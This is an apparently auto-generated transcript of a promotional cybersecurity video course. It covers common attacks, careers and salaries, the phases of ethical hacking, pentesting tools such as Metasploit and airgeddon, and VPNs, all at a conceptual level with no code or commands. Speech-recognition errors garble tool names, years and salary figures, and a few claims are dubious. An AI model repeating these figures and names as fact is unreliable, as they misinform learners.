Transcript for:
Comprehensive Overview of Cyber Security

did you know that Facebook removed 2.29 billion content pieces from their website after a record number of complaints regarding hacked accounts even the mighty Facebook cannot secure its systems 100 such is a situation when it comes to cyber security based on recent events and future predictions cyber crimes will cost organizations worldwide are whopping 10.5 trillion dollars coming from just 3.5 trillion dollars in 2050. so you can understand why it should not come as a surprise that professionals trade in cyber security are in sky high demand and will be for the foreseeable future so what's better than staying ahead of the curve and getting trade in cyber security subscribe of course since we upload Tech related content every day hit the Bell icon to get notified whenever we drop a new video today's video will be a full course on cyber security for 2023 starting from the basics to the advanced topics we provide a small introduction to cyber security followed by explainers regarding the career scope in this domain and the job roles offered after covering a few cyber security skills we will learn about ethical hacking and Network masking techniques like vpns and proxies further we delve into various attacks like DDOS attacks SQL injection and cross-site scripting with live demonstrations that you can carry out on your own system for practice after learning a bit more about different cyber attacks we will learn about cryptography covering topics like encryption famous algorithms like RSA and AES and hashing algorithms like sha-256 algorithms next we look at the Linux based operating systems that you can use for ethical hacking like car Linux and parrot security we then further dive into some of the tools that cyber security analysts use to secure their systems finally we cover the industry's most well-known certifications followed by a series of interview questions to prepare you for your first job in cyber security so let's get started meet Anne she often shops from www.shoppingcart.com she has her information like email ID address and credit card details saved on the website to enable a faster and hassle-free shopping experience the required information is stored in a server one day Anne received an email which stated her eligibility for special discount voucher from shoppingcard.com in order to receive the coupon code she was asked to fill in her shopping cart.com account credentials this didn't seem fishy to her at the time as she thought it was just an account verification step little did she realize the danger she would be facing she was knocked off her feet when a substantial amount of money was wiped off her account how do you think this happened well yes the email she received was fake and shoppingcart.com account witnessed unauthorized access from a third party this type of attack is known as a Cyber attack and the person who carries it out is called a hacker could Anne have prevented this attack indeed she could have with the help of cyber security cyber security involves techniques that help in securing various digital components networks data and computer systems from unauthorized digital access there are multiple ways to implement cyber security depending on the kind of network you are connected to and the type of cyber attacks you are prone to so let's take a look at the various cyber attacks that Anne could have been exposed to one of the most common types of cyber attacks is a malware attack like Trojan adware and spyware to name a few had and downloaded any suspicious attachments online her system could have gotten corrupted by certain malicious viruses embedded within the attachments next is a phishing attack the type of Cyber attack which Anne experienced here the hacker usually sends fraudulent emails which appear to be coming from a legitimate Source this is done to install malware or to steal sensitive data like credit card information and login credentials another type of attack is the man in the middle attack here the hacker gains access to the information path between Anne's device and the website's server the Hacker's computer takes over Anne's IP address by doing so the communication line between Ann and the website is secretly intercepted this commonly happens with unsecured Wi-Fi networks and also through malware password attack is one of the easiest ways to hack a system here Anne's password could have been cracked by using either common passwords or trying all possible alphabetical combinations to prevent future cyber attacks and sought to implement a few cyber security practices first she installed a firewall as the name suggests it is a virtual wall between Ann's computer and the internet firewalls filter the incoming and outgoing traffic from your device to safeguard your network and they can either be software applications or Hardware reinforcements secondly an implemented honey pots just like how flowers attract bees dummy computer systems called honeypots are used to attract attackers these systems are made to look vulnerable in order to deceive attackers and this in turn defends the real system in addition to these she also decided to use unique alphanumeric passwords antivirus software and started avoiding males from unknown senders that was Anne's story cyber attacks are not just confined to individuals but also to public and private organizations cyber attacks carried out in such places are more deadly and they result in colossal losses motives of such attacks are many starting from tampering with crucial data to monetary gains let's have a look at a few of the cyber attacks that companies are subjected to various public sector organizations and large corporations face the advanced persistent threat apt in this form of attack hackers gain access to networks for a prolonged period in order to continuously gain confidential information companies also witnessed the denial of service attack where networks are flooded with traffic which in turn leaves legitimate service requests unattended a variant of this is the distributed denial of service DDOS attack when multiple systems are used to launch the attack when a hacker manipulates a standard SQL query in a database driven website it is known as a SQL injection attack by doing so hackers can view edit and delete tables from databases amidst a plethora of cyber attacks it is indeed a challenge for organizations with several networks and servers to ensure complete Security this is not an easy task and to help with this cyber Security Professionals are hired to work on identifying cyber threats and securing a company's Network there are multiple job roles in the field of cyber security if hacking fascinates you then the role of an ethical hacker is something to be explored such professionals try to a Network's vulnerabilities just like how a hacker would do but only to identify those vulnerabilities and resolve them for protection against an actual Cyber attack but if you are looking to design robust security structures then the role of a security architect is more apt a chief information security officer ciso plays a crucial role in Enterprise security and is entrusted with the overall safety of the information in an organization now there are several reasons as to why you should learn cyber security here we have the top 10 reasons for the same at number 10 the reason we have is basic requirements there is a wrong notion that building a career in cyber security is daunting well it is not a fancy college degree is not at all that it takes to become a successful cyber security professionally you can Venture into the domain of cyber security with some basic knowledge of I.T and with an authorized cyber security certification the overall eligibility Criterion for the cyber security domain is relaxing across the world it professionals with cyber security certifications are known to receive higher salary packages certifications are always given extra weightage in the infosec field and it opens doors to bigger opportunities these cyber security certifications can be opted by anyone as the eligibility for these are very basic cyber security certifications trained professionals and thus helps in Bridging the Gap between the supply and demand of skilled cyber Security Professionals so don't take a step back from learning cyber security thinking it is a tedious process if you are a fresher or a professional you can go ahead with just these basic requirements before moving on to our next reason here is a question for you all how many of you like mathematics please let us know in the comment section below I'm sure not everyone loves mathematics and that is completely okay when it comes to learning cyber security and our ninth reason is mathematics is not a concern for learning cyber security many of us find mathematics challenging some have the aptitude for dealing with numbers and some don't and for those who don't they find it difficult to proceed with a career that has maths involved however you can take your decision without any worries when it comes to cyber security as the domain of cyber security does not involve mathematics so if maths is not your strong point then choosing to learn cyber security is a great choice this can definitely be a relief to many instead you can get acquainted with networking network security control and coding to build a career in cyber security our eighth reason is that cyber security is a profession that helps achieve the greater good cyber security consists of a set of measures and approaches that help companies and individuals data from being compromised and stolen cyber Security Professionals have defended organizations from several deadly cyber attacks that aimed at jeopardizing an organization's confidentiality integrity and availability cyber crimes are currently on their eyes but different types of cyber attacks the threat to organizations and individuals alike is only growing by the day government agencies police forces and cyber crime cells are tackling this threat however there is more requirement for skilled cyber security professionals who can protect data and work for the greater good therefore if you want to bring about a positive impact and a meaningful difference to the society we live in then learning cyber security is a great choice our seventh reason is that you get to travel the world who doesn't love to travel the globe learning cyber security is a great reason especially for those of you who aspire to travel the world with the lack of cyber Security Professionals in the world there are plenty of opportunities for skilled experts to travel overseas to Showcase their cyber security skills which are in high demand The increased demand for cyber Security Professionals is not just restricted to one area but to the entire world there are several employment opportunities for cyber Security Professionals across the globe so learning cyber security can open new doors for you overseas as well our sixth reason is very interesting and that is the fact that you get to work with secret agencies and high profile ones like other professionals cyber Security Professionals also have the opportunity to work with several prestigious multinational companies and big giants like Google Dell Accenture and others however a cyber security professional's career opportunities can go beyond mncs and they might get the opportunity to work with top government secret agencies like mosad NSA Nia FBI and so on so what are you waiting for become a cyber security expert and showcase your skills to grab the chance to work with these top agencies our fifth reason is it is never too late to begin with there are very few professions that give you the Liberty to begin late and one such profession is cyber security it is never too late to realize that you want to become a cyber security expert many people work as cyber Security Professionals even after the retirement if they have a good knowledge about it you could also join cyber security courses that train you irrespective of your age as long as you have good cyber security skills there is no need to worry about job security however late it is our fourth reason is cyber security is an evergreen industry cyber security has gradually become an evergreen industry in the current times with the onset of the covid-19 pandemic businesses are moving online and shifting to cloud storage the demand for cyber security is at its peak there is a high demand for cyber Security Experts who can Safeguard Digital Data hence we can be rest assured that cyber security is here to stay and this domain is only going to grow in the coming years according to cyber security Ventures the number of Internet users will hit a whopping 6 billion by 2022. these numbers speak volumes and this reveals the growing demand for cyber Security Professionals across the globe digitalization is taking place across several Industries a cyber security expert finds opportunities in every field as every organization wants to be secure on the digital front so now is the right time if you are looking to learn and start a career in cyber security before moving to our top three reasons to learn cyber security here are some crucial information for you all as you know with relevant certifications you can grow your cyber security career and here we are to help you with that you can check out Simply loans cyber security export Masters program to equip you with the necessary skills to become an expert in this rapidly growing domain training for highly sought after certifications like CompTIA Security Plus CH cism and cissp is at the Forefront of this course preparing you for the industry's best jobs so what are you waiting for get certified with simply learn and grow your career in cyber security today so our third reason to learn cyber security is because of the plenty of job opportunities it offers according to the U.S Bureau of Labor Statistics the employment of information security analyst is projected to grow 33 percent from 2020 to 2030 much faster than the average for all occupations with the world turning digital there is a dire need for companies to hire cyber Security Experts who can protect and Safeguard sensitive data as firms work to improve their cyber security structure they are also hiring several cyber security exports to design Implement and maintain the Cyber Security Solutions cyber security jobs are not limited to the it domain many security positions are found at companies outside of it including Industries like Media Sports or Finance to name a few this emphasizes on the fact that cyber security export is exposed to several job opportunities from different types of companies across the globe our second reason for you to learn cyber security is the good salary package it offers salaries play a crucial part in any job that you undertake isn't it every individual likes to get duly rewarded for their work and cyber security is one such domain that provides fat paychecks cyber security exports are the individuals who have come to the rescue with the unprecedented rise in cyber crimes across the world organizations are willing to pay Sky High salaries for these cyber security exports there is a lack of skilled cyber Security Professionals and this is another reason cyber Security Experts are paid well the salaries of cyber Security Professionals are still expected to grow in the coming times owing to the high demand salaries and cyber security have a high growth potential and if you are a skilled cyber security professional you can always negotiate your salary finally a top reason to learn cyber security is that you will have a job that never gets boring and a domain that offers unlimited potential for personal growth several times individuals find themselves lost in their career due to lack of challenges due to their mundane work and also due to stagnation at work these reasons play a major role when it comes to a professional quitting their job however a job role in cyber security tackles these reasons to an extent and that is why we have this reason at number one cyber security is a domain that is constantly evolving and so are the nature of cyber attacks hackers are always trying to develop new methods to get to your data they develop new exploits regularly and hence as a cyber security professional you will face interesting challenges to find Optimal Solutions for new exploits you will have new puzzles to solve a cyber security career is not going to be stale along with failures you will also be exposed to new and interesting discoveries to keep yourself updated in this field and to tackle cyber attacks you should be in a position to outsmart the hackers being in the field of cyber security allows you to constantly upskill and enhance your knowledge and experience it also ensures that your Learning Journey will never stop with the world churning virtual cyber attacks are constantly flooding new headlines covid-19 accelerated the current digital transformation in the year 2020 witnessed several data breaches since technology has become more intertwined with our daily lives it is no surprise that the need for skilled cyber Security Professionals is increasing on that note hey everyone welcome yet to another exciting video by simply learn which will take you through the top cyber security career options available today but before we begin if you're new here and haven't subscribed already make sure to hit the Subscribe button and that Bell icon for interesting Tech videos every day there is a significant lack of skilled cyber security professionals who can tackle the cyber security challenges faced daily hence a career in cyber security is demanding and equally rewarding finding the right career path in the cyber security industry isn't always easy here we are here to help you with that there are a few prerequisites for a career in cyber security the basic one being a bachelor's degree in a subject relating to cyber security however if you don't have a relevant degree you can always take up relevant cyber security certifications and kick-start your cyber security Journey a few other skills like networking knowledge of operating systems and Cloud security are required to start and grow your cyber security career you can check out our video on the top 5 cyber security skills to know more cyber security jobs vary from entry level to Executive management and everything in between there are several cyber security paths available today it is best if you start with entry level and then move on to the next level with the help of certifications and relevant experience here let us have a look at the top 5 cyber security job rules today the first job role is that of a network engineer Network Engineers construct and administer a company's computer networks they are responsible for installing configuring and supporting Network equipment they also configure and maintain firewalls switches and routers this entry-level cyber security job can help you start your journey to become an ethical hacker the annual average salary of a network engineer in the US is 85 098 dollars and in India it is around 510 000 rupees second on our list is information security analyst as an information security analyst your primary duty is to protect sensitive information information security analysts create and Implement plans for preventing cyber attacks they monitor data access and ensure compliance with policies depending on the Cyber threat they decide if it has to be resolved or escalated further in the U.S an information security analyst earns eight to nine thousand and one hundred forty dollars annually and in India they earn 6 lakh 42 and 756 rupees third on our list is ethical hacker they are also known as penetration testers they are Network Security Consultants who identify and exploit system vulnerabilities just like how a hacker would do vape probe and test and network using various penetration tools and software they also design new penetration tools and document the test results in the US a certified ethical hacker earns around ninety three thousand dollars on an annual average basis and in India they make around 5 lakh rupees the fourth job role that we are going to talk about is security architect security Architects research and plan the security elements for their organizations they design robust security structures that are capable of preventing malware attacks a security architect approves the installation of routers VPN and firewalls their duties go beyond just architecture building and including formulating company procedures guidelines and user guides security architects in the US make a handsome sum of 124 thousand dollars a year on an average and in India they make nearly 21 lakh 80 000 rupees and finally fifth on our list is Chief Information Security Officer ciso they are senior level officers in an organization they ensure the safety of the information they develop Implement and maintain information security and risk management programs they also interact with stakeholders and regularly brief them with information security concerns the average annual salary of a chief information security officer in the states is a whopping 165 thousand dollars annually and in India it is 22 lakh 22 and 845 rupees several companies are looking for skilled cyber Security Professionals Philips Siemens Google Microsoft and GE to name a few with passion the right amount of experience and relevant certifications you can grow your cyber security career you can check out Simply learned cyber security expert Masters program to equip you with the necessary skills needed to become an expert in this rapidly growing domain this course will help you learn various methods as to how you can protect your infrastructure secure your data run risk analysis achieve compliance and much more according to cybercrime magazine by cyber security Ventures globally there would be nearly 3.5 million unfilled cyber security jobs by 2021 and the number of Internet users will hit a whopping 6 billion by 2022. these numbers speak volumes and this shows the growing demand for cyber Security Professionals across the globe now that you know the high demand for cyber Security Professionals let us help you start your cyber security career by bagging the right skill set many of you out there might be waiting to become a cyber security professional but are unsure of how to go about it and what skills you would need to get a cyber security job not to worry we are here to help you with that after extensive research we have come up with the top 5 skills that will help you get into the field of cyber security let's have a look at these skills individually first we have networking and system administration the number one skill you need to have to enter the field of cyber security is computer networking networking is the backbone of the internet it is imperative that you have an in-depth understanding of networking to start a career in cyber security a network is a group of interconnected devices and networking is the art of understanding how data is sent transmitted and received amongst these devices you need to know various routing protocols the TCP and OSI models govern networking The OSI model is comparatively newer basically in these models all the protocols are grouped into layers and work together to help you receive data on your device sent from a server learning networking will help you understand the technical aspects of data transmission which will help you secure your data you can take up networking certifications like Security Plus and Cisco CCNA to gain a strong networking Foundation another skill that will be beneficial for you is to Master System Administration if you think about it all of us are CIS admins at some level system administration is all about configuring and maintaining computers you must be curious to know every aspect of your computer features and settings and play around a bit carry out a trial and error method and give yourself small tasks like recovering deleted files or monitoring old viruses on a VM explore new techniques put them into use and expand your knowledge let us now move on to our second skill knowledge of operating systems and virtual machines to become a cyber security professional you need to have a strong knowledge of operating environments such as Windows Linux and Mac OS cyber Security Professionals largely use Linux and it comes with several tools to learn operating systems go ahead and set up and use Virtual machines that is VMS and play around with them this will help you gain hands-on experience as a cyber security expert you should be comfortable working on any OS VMS allow you to train and research in an isolated environment and help you maximize your skills the next point to remember is to know Kali Linux it is the most widely known Linux distribution for ethical hacking and penetration testing it comes with several hundred tools related to penetration testing malware analysis security research computer forensics and so on Kali contains several projects and you can learn a lot another good thing about Kali is that it is free to use so what are you waiting for download and start right away remember that Linux is the backbone of cyber security and a commonly asked topic for cyber security interviews especially for pen testing roles moving on to our third skill our third skill is network security control it is another basic skill that every cyber security professional should have network security control refers to the different measures which are employed to enhance the security of a network it is simple you can only Safeguard your network if you know how it works how routers firewalls and other devices work a firewall is a hardware or software that blocks incoming or outgoing traffic from the internet to your computer firewalls are required to secure a network as a cyber security expert you must be able to leverage a firewall to filter and prevent unauthorized traffic onto the network in addition to that as a cyber security expert you must know about intrusion detection systems intuition prevention systems virtual private networks and remote access and intrusion detection system IDs is designed to detect unauthorized access to a system it is used together with a firewall and a router you should be able to operate the IDS and recognize any security policy violations and malicious traffic on the network as many of you may have used a VPN is a connection between a VPN server and a VPN client it is a secure tunnel across the internet moving on next up we have an interesting skill any idea what that is if yes boss and leave a comment as to what you think the next skill will be if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the link in the description to know more and before we jump into this skill if you find this video interesting make sure to give it a thumbs up fourth skill on our list is coding so you might be wondering if coding is really required to become a cyber security professional well it is true that not all cyber Security Professionals have or need coding skills however having zero coding knowledge May limit your opportunities in the future knowing a couple of programming languages will help you identify the plan behind an attack and defend against deadly hacking techniques so as seen on your screens these are the best programming languages to learn to make your cyber security career worthwhile we have C and C plus plus the C programming language is the backbone of most operating systems C and C plus plus are low level programming languages that you need to know as a cyber security professional on the other hand python is a high level programming language that is becoming popular among cyber Security Experts today knowing python will give you an upper hand in your career it will help you identify and fix vulnerabilities JavaScript is another high level programming language that adds interactivity to web pages a good advantage of knowing JavaScript is that you can prevent cross-site scripting attacks from occurring as in these attacks the attacker implants malicious code in a web application speaking of PHP because most of the websites are created using PHP learning it will help you defend against intruders similarly HTML is another language cyber Security Professionals should understand as most websites use it and it is one of the easiest languages to learn another programming language that you can use is golang it is great for cryptography you can solve various cyber security problems with it then we have SQL that is structured query language attackers use this language to damage the stored data one such example is the SQL injection attack hence having a good understanding of SQL will be highly beneficial another Point we'd like to highlight is to have knowledge of Assembly Language this will help you become a cyber security engineer assembly will help you understand how malware functions and thereby help you defend against it in the cyber security domain you can't just lock into a single language and hence it is advised that you are acquainted with a couple of them you can also do a crash course with these languages and learn them hence determine the best programming language for your cyber security role and get familiar with the basics moving on our fifth skill on the list is cloud security there is a growing demand for cyber Security Professionals with Cloud security skills in the coming years companies are on the lookout for professionals with security skills applicable to public and hybrid Cloud platforms such as Amazon web services and Azure more organizations look to Cloud infrastructure to store data and run applications this includes implementation of policies and technologies that protect cloud-based systems and devices just like application development security Cloud security also involves building secure systems from the start companies want professionals who can manage the cloud security tools to identify and prevent any Cloud breaches people with experience and knowledge in managing big platforms such as Microsoft Azure AWS and the gcp are in high demand now that we have seen the top 5 cyber security skills let us go through a set of additional skills that can help you get into the cyber security field remember that to become a successful cyber security expert you must possess a rich and diverse skill set so in a list of additional skills first we have risk analysis identifying risks even before their arrival is a great skill cyber Security Professionals are required to identify manage and mitigate risks risk management and mitigation is a skill set that is going to be highly in demand in the coming years next we have information security companies require skilled professionals who can protect their electronic data from unauthorized taxes here in demand skills are authentication authorization malware analysis and data recovery next on our list is security incident handling and response as a cyber security expert you must be prepared to handle any forthcoming threat of violating an organization security policy by following an updated incident response plan your team can proactively protect your data and minimize the damages in security Incident Management you are required to identify manage record and analyze security threats in real time a security incident can be an active threat or a successful compromise of data or an attempted intrusion it can also be incidents like DDOS attacks fishing apt's ransomware and many more another important pointer is that as a security practitioner you must also manage and analyze the security information and even management Siem tools and services moving on we have security audit security auditing is an internal check that is carried out to find flaws in the organization's information system you must be able to conduct a review of the organization's adherence to regulatory guidelines security audit and compliance knowledge are very crucial as any mystery of Regulatory Compliance could lead to Hefty penalties soon organizations will need people who are more familiar with the various data privacy regulations if you are good at paperwork you can capitalize on this skill companies will need people who can understand what paperwork to file and which security protocols to use to comply with the regulations finally we have laws and regulations and often overlooked cyber security aspect there are several cyber security laws and regulations and if you break these laws intentionally or not it doesn't matter as you will still be charged these laws Define how you can use the internet and it also defines how people can be protected from becoming the victims of cyber crimes knowing these laws and regulations and following the best practice will make you ethical at your job and this will in turn be good for your organization so those were our list of additional skills apart from these make sure you stay updated with new hacks and learn new tools as cyber security is ever evolving another important skill apart from these technical skills is your soft skills having a set of good soft skills will help you back your dream job we have a video on the top 5 soft skills that will help you grow in your career do watch that and incorporate those skills as well we humans are highly tech savvy in today's times with the extensive use of the internet and modern Technologies there is a massive challenge in protecting all our Digital Data such as net banking information account credentials and medical reports to name a few have you heard about the deadly what a cry ransomware attack the attack happened in May 2017 in Asia and then it spread across the world within a day more than 230 000 computers were infected across 150 countries the wannacry cry crypto worm encrypted the data and locked the users out of their systems for decryption of the data the users were asked for a ransom of 300 to 600 in Bitcoin the users who use the unsupported version of Microsoft Windows and those who hadn't installed the security update of April 2017 were targeted in this attack the one at cry attack took a toll on every sector top-tier organizations like Hitachi Nissan and FedEx had to put their businesses on hold as their systems were affected too now this is what you call a Cyber attack to prevent such attacks cyber security is implemented we can Define cyber security as the practice of protecting networks programs computer systems and their components from unauthorized digital attacks these illegal attacks are often referred to as hacking hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information a hacker is a person who tries to hack into computer systems this is a misconception that hacking is always wrong there are hackers who work with different motives let's have a look at three different types of hackers black hat hackers are individuals who illegally hack into a system for a monetary gain on the contrary we have white hat hackers who exploit the vulnerabilities in a system by hacking into it with permission in order to defend the organization this form of hacking is absolutely legal and ethical hence they are also often referred to as ethical hackers in addition to these hackers we also have the gray hat hackers as the name suggests the color gray is a blend of both white and black these hackers discover vulnerabilities in a system and report it to the system's owner which is a good act but they do this without seeking the owner's approval sometimes gray hat hackers also ask for money in return for the spotted vulnerabilities now that you have seen the different types of hackers let's understand more about the hacking that is legal and valid ethical hacking through an interesting story Dan runs a Trading Company he does online training with the money his customers invest everything was going well and Dan's business was booming until a hacker decided to hack the company's servers the hacker stole the credentials of various trading accounts he asked for a lump sum Ransom in exchange for the stolen credentials Dan took the Hacker's words lightly and didn't pay the hacker as a result the hacker withdrew money from various customers accounts and Dan was liable to pay back the customers Dan lost a lot of money and also the trust of his customers after this incident Dan gave a lot of thought as to what could have gone wrong with the security infrastructure in his company he wished there was someone from his company who could have run a test attack to see how vulnerable systems were before the hacker penetrated into the network this was when he realized he needed an employee who thinks like a hacker and identifies the vulnerabilities in his Network before an outsider does to do this job he hired an ethical hacker John John was a skilled professional who worked precisely like a hacker in no time he spotted several vulnerabilities in Dan's organization and closed all the loopholes hiring an ethical hacker helped Dan protect his customers from further attacks in the future this in turn increased the company's productivity and guarded the company's reputation so now you know hacking is not always bad John in this scenario exposed the vulnerabilities in the existing Network and such hacking is known as ethical hacking ethical hacking is distributed into six different phases let us look at these faces step by step with respect to how John our ethical hacker will act before launching an attack the first step Jon takes is to gather all the necessary information about the organization's system that he intends to attack this step is called reconnaissance he uses tools like nmap and hping for this purpose John then tries to spot the vulnerabilities if any in the Target system using tools like nmap and Expos this is the scanning phase now that he has located the vulnerabilities he then tries to exploit them this step is known as gaining access after John makes his way through the organization's networks he tries to maintain his access for future attacks by installing back doors in the Target system the Metasploit tool helps him with this this phase is called maintaining access John is a brilliant hacker hence he tries his best not to leave any evidence of his attack this is the fifth phase clearing tracks we now have the last phase that is reporting in this phase John documents a summary of his entire attack the vulnerabilities he spotted the tools he used and the success rate of the attack looking into the report Dan is now able to take a call and see how to protect his organization from any external cyber attacks don't you all think Jon is an asset to any organization if you want to become an ethical hacker like John then there are a few skills that you need to acquire first and foremost you need to have a good knowledge of operating environments such as Windows Linux Unix and Macintosh you must have reasonably good knowledge of programming languages such as HTML PHP python SQL and JavaScript networking is the base of ethical hacking hence you should be good at it ethical hackers should be well aware of security laws so that they don't misuse their skills finally you must have a global certification on ethical hacking to successfully bag a position of an ethical hacker like John few examples of ethical hacking certification are certified ethical hacker certification ceh CompTIA pin Test Plus and license penetration tester certification to name a few simply learn provides a cyber security expert master's program that will equip you with all the skills required by a cyber security expert when it comes to web app hacking It generally refers to the exploitation of applications by HTTP which can be done by manipulating the applications via its graphical user interface this is done by tampering with the uniform resource identifier also known as a URI or tampering with the HTTP elements directly which are not a part of the URI the hacker can send a link via an email or a chat and may trick the users of a web application into executing actions in case the attack is on an administrator account the entire web application can be compromised anyone who uses a computer connected to the internet is susceptible to the threats that computer hackers and online Predators post these online billions typically use phishing scams spam email or instant messages and bogus websites to deliver dangerous malware to your computer and compromise the computer security computer hackers can also try to access your computer and private information directly if you are not protected by a firewall they can monitor your conversations or produce the back end of your personal website usually disguised with a bogus identity Predators can lure you into revealing sensitive personal and financial information a web server which can be referred to as the hardware the computer or the software which helps to deliver content that can be accessed through the internet the primary function of a web server is to deliver these web pages on the request to clients using the hypertext transfer protocol or http so hackers attacked the web server to steal credential information passwords and business information by using different types of attacks like DDOS attacks syn flooding pink flood port scan and social engineering attacks in the area of web security despite strong encryption on the browser server Channel web users still have no Assurance about what happens at the other end although wireless networks offer great flexibility they have their own security problems a hacker can sniff the network packets without having to be in the same building where the network is located as wireless networks communicate through radio waves a hacker can easily sniff the network from a nearby location most attackers use Network sniffing to find the SSID and hack a wireless network an attacker can attack a network from a distance and therefore it is sometimes difficult to collect evidence against the main hacker social engineering is the art of manipulating users of a Computing system into revealing confidential information which can be later used to gain unauthorized access to a computer system the term can also include activities such as exploiting human kindness greed and curiosity to gain access to restricted access buildings or getting the users to installing backdoor software knowing the tricks used by hackers to trick users into releasing vital login information is fundamental in protecting computer systems coming to our main focus for today let us have a look at the top 5 most essential ethical hacking tools to be used in 2021 at the top of the chain lies and map nmap which stands for network mapper is a free and open source utility for network discovery and security auditing many systems and network administrators also find it useful for tasks such as Network inventory managing service upgrade schedules and monitoring host or service uptime it is most beneficial in the early stages of ethical hacking where a hacker must figure the possible entry point to a system before running the necessary exploits thus allowing the hackers to leverage any insecure openings and thus Bridge the device nmap uses raw IB packets in novel ways to determine what hosts are available on the network what service they are running what operating systems are installed what type of packet filters and firewalls are in use and dozens other characteristics it was designed to rapidly scan large networks but works finest against single host as well since every application that connects to a network needs to do so via a port the wrong port or a server configuration can open a can of worms which lead to a thorough breach of the system and ultimately a fully hacked device next on our list we have Metasploit the better sploit framework is a very powerful tool that can be used with cyber criminals as well as ethical hackers to probe systematic vulnerabilities on both networks and servers because it's an open source framework it can be easily customized and used with most operating systems with Metasploit the ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots as another flavor of threat hunting once the flaws are identified and documented the information can be used to address systemic weaknesses and prioritize Solutions once a particular vulnerability is identified and the necessary exploit is value to the system there are a host of options for the hacker depending on the vulnerability hackers can even run root commands from the terminal allowing complete control over the activities of the compromise system as well as all the personal data stored on the device a big advantage of Metasploit is the ability to run full-fledged scans on the target system which gives a detailed picture of the security index of the system along with the necessary exploits that can be used to bypass the antivirus softwares having a single solution to gather almost all the necessary points of attack is very useful for ethical hackers and penetration testers as denoted by its high rank in the list moving on we have the acunetics framework kinetics is an end-to-end web security scanner which offers a 360 degree view of an organization security it is an application security testing tool that helps the company address vulnerability across all their critical web assets the need to be able to test application in depth and further than traditional vulnerability management tools has created a market with several players in the application security space accuratics can detect over 7000 vulnerabilities including SQL injections cross-site scripting misconfigurations weak passwords exposed database and other out-of-band vulnerabilities it can scan all pages web apps and complex web applications running HTML5 and JavaScript as well it also lets you scan complex multi-level forms and even password protected areas of the site iconetix is a dynamic application security testing package which has definite perks over status application security testing Frameworks which are also known as sasd scanners sast tools only work during development and only for specific languages and have a history of reporting lot of false positives whereas Dynamic testing tools also known as DST have the ability to streamline testing from development to deployment with minimal issues next on our list we have air Garden this is a multi-use bash script used for Linux systems to hack and audit wireless networks like our everyday Wi-Fi router and its counterparts along with being able to launch denial of service attacks on compromise networks this multipurpose wi-fi hacking tool has very rich features which support multiple methods for wi-fi hacking including WPS hacking modes WP attacks handshake captures evil twin and so much more it usually needs an external network adapter that supports monitor mode which is necessary to be able to capture Wireless traffic that reverse the air channels thanks to its open source nature air Garden can be used with multiple Community plugins and add-ons thereby increasing its Effectiveness against a wide variety of routers both in the 2.4 gigahertz and the 5 gigahertz band finally at number 5 we have John the Ripper John the Ripper is an open source password security auditing and the password recovery tool which is available for many operating systems John the Ripper jumbo supports hundreds of hash and Cipher types including for user passwords of operating systems web apps database servers encrypted keys and document files some of the key features of the tool include offering multiple modes to speed up the password cracking automatically deselecting the hashing algorithm used by the passwords and the ease of running and configuring the tool to make it password cracking easier it can use dictionary attacks along with regular brute forcing to speed up the process of cracking the correct password without wasting additional resources the word is being used in these dictionary attacks can be used by the users and allowing for a completely customizable process we also have a few honorary mentions in our list that just missed the cut let's Parker for instance is an automated yet fully configurable web application security scanner that enables you to scan websites web applications and web services the scanning technology is designed to help you secure web applications easily without any fuss so you can focus on fixing the reported vulnerabilities the bobsled professional is one of the most popular penetration testing and vulnerability finder tools and is used for checking web application security the term burp as it is commonly known is a proxy based tool which is used to evaluate the security of web-based application and to do Hands-On testing moving away from websites and applications Wireshark is a free and open source packet analyzer which was launched in 2006. it is used for Network troubleshooting analysis software and Communications protocol development and education it captures Network traffic on the local network and stores data for offline analysis vaisha captures Network traffic from ethernet Bluetooth wireless networks and frame relay connections now that we learn about the different types of tools that can be used when conducting an ethical hacking audit let's learn about some potential benefits of such campaigns and why organizations prefer to pay for such audits being able to identify defects from an attacker's perspective is game changing since it displays all the potential Avenues of a possible hack one can only prepare for the known vulnerabilities as a defensive specialist but proactively trying to breach a network or device can make hackers think of techniques that no defense contractors can account for this kind of unpredictability goes a long way in securing a network against malicious actors another advantage of hiring ethical hackers is the ability to preemptively fix possible weak points in a company's Network infrastructure as seen on many occasions a real breach will cause loss of data and irreparable damage to the foundation of an organization being able to gauge such shortcomings before they become public and can be used exploited is a benefit most organizations make use of this is not to imply that such security audits are only beneficial to the organization paying for it when coming across companies that provide certain Services a reliable third-party security audit goes a long way in instilling trust and confidence over the craft if the ethical hackers cannot find any major vulnerabilities that can be leveraged by hackers it just accentuates the technical Brilliance of the organization and its Engineers thereby increasing the clientele by a substantial amount Jude is waiting at the airport to hop on her flight back home when she realizes that she missed making an important Bank payment she connects her laptop to the public Wi-Fi at the airport and goes ahead to carry out the bank transaction everything goes well and Jude completes her transaction after a couple of days she was wiped off her feet when she learned that her bank account was subjected to a Cyber attack and a hefty amount was wiped from her account after getting in touch with the bank Authority she learned that her account was hacked at the airport she didn't realize that the public Wi-Fi she used might have caused her this trouble Jude wishes that Hatter bank transfer escaped the Hacker's eyes she would not have been a victim of a Cyber attack Bank officials advise her to use a VPN for future transactions especially when connecting to an open or public network like most of us Jude had come across the term VPN several times but didn't know much about it and little did she think that the repercussions of not using a VPN would be this bad let's understand how the hacker would have exploited Jude's transaction in the absence of a VPN in this process Jude's computer first connects to the internet service provider ISP which provides access to the internet she sends her details to the bank's server using her IP address that protocol address or IP address is a unique address that recognizes a particular device be it a laptop or smartphone on the internet when these details pass through the public network the hacker who passively watches the network traffic intercepts it this is a passive Cyber attack where the hacker collects Jude's Bank details without being detected more often or not in such an attack payment information is likely to be stolen the targeted data here are the victim's username passwords and other personal information the unsecured connection exposed Jude's IP address and Bank details to the hacker when it passed through the public network so would Judith been able to secure her transaction with the help of a VPN well yes picture Jude's Bank transaction to be happening in a tunnel that is invisible to the hacker in such a case the hacker will not be able to spot a transaction and that is precisely what a VPN does a virtual private Network more often known as VPN creates a secure tunnel between your device and the internet for using a VPN Jude's First Step would be to install software-based technology known as the VPN client on our laptop or smartphone that would let her establish a secure connection the VPN client connects to the Wi-Fi and then to the ISP here the VPN client encrypts Jude's information using VPN protocols data is encrypted to make sure it is secure next the VPN client establishes a VPN tunnel within the public network that connects to the VPN server the VPN tunnel protects Jude's information from being intercepted by the hacker Jude's IP address and actual location are changed at the VPN server to enable a private and secure connection finally the VPN server connects to Jude's Bank server in the last step where the encrypted message is decrypted this way Jude's original IP address is hidden by the VPN and the VPN tunnel protects your data from being hacked this explains how VPN makes your 